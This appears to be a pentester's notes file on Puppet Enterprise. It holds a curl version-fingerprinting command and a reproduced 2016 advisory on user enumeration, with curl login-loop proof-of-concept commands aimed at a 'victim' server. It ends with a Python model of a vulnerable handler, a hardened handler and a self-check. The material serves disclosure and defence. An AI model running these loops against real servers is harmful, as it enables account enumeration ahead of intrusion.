puppet.txt
* Get version via install script (port may differ)
curl -sk https://<host>:8140/packages/current/install.bash | grep 'Puppet'
...
fail "$(uname -s) is not a supported platform for Puppet Enterprise v3.8.0
------------------------------------------------------------------------------------------
Puppet Enterprise Web Interface User Enumeration
https://seclists.org/bugtraq/2016/Oct/48
Vendor Acknowledgement: August 23, 2016
Vendor Releases Version: 2016.4.0
Public Disclosure: October 17, 2016
Details:
=====================
By sending remote HTTP requests to the Puppet Enterprise Web Interface, it is possible to enumerate valid user account names by sending
more than 10 requests. If the user does not exist, we will continue to get the 'Authentication failed.' HTTP response from the victim server.
However, if the user does exist, we will no longer receive that message, confirming the user exists.
PoC:
================
* Verified/Tested on v3.8.0:
Send the login request 11 times; after 10, we will know whether the user exists or not.
FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=IDONTEXIST -d password=1
HTTP 200 OK
'Authentication failed.'
FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=BOZO -d password=1
HTTP 200 OK
----
while [ 1 ]; do curl -k https://<host>/auth/login?redirect=bla -d username=<username> -d password=1; done
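The response difference described in the advisory above, modelled as an added example (this is not Puppet's code or the advisory's PoC): a login handler whose failure message changes once an existing account hits the lockout threshold, beside a hardened handler that enforces the same lockout but returns one identical message on every failure path, plus a self-check a defender can run against their own handler. The in-memory account store, the threshold of 10 and the message strings are assumptions.

```python
from collections import defaultdict

LOCKOUT_THRESHOLD = 10                 # assumed; matches the 10-request oracle in the advisory
USERS = {"alice": "correct-horse"}     # constructed in-memory account store


class VulnerableLogin:
    """Leaks lockout state: the message changes only for accounts that really exist."""

    def __init__(self):
        self.failures = defaultdict(int)

    def login(self, username, password):
        if username not in USERS:
            return "Authentication failed."        # unknown names never reach the lockout branch
        if self.failures[username] >= LOCKOUT_THRESHOLD:
            return "Account locked."               # different wording -> existence oracle
        if USERS[username] == password:
            self.failures[username] = 0
            return "OK"
        self.failures[username] += 1
        return "Authentication failed."


class HardenedLogin(VulnerableLogin):
    """Same lockout policy, but every failure path yields the same response."""

    def login(self, username, password):
        locked = self.failures[username] >= LOCKOUT_THRESHOLD
        # Count attempts for unknown names too, so the handler's state does not depend on existence.
        self.failures[username] += 1
        if username in USERS and not locked and USERS[username] == password:
            self.failures[username] = 0
            return "OK"
        return "Authentication failed."            # locked, wrong password and unknown user look alike


def leaks_existence(handler, known="alice", unknown="IDONTEXIST", attempts=11):
    """Self-check: probe a known and an unknown name with a bad password 11 times each.

    Returns True when the two response sequences differ, i.e. the handler is an enumeration oracle.
    """
    seen = {}
    for name in (known, unknown):
        seen[name] = [handler.login(name, "1") for _ in range(attempts)]
    return seen[known] != seen[unknown]
```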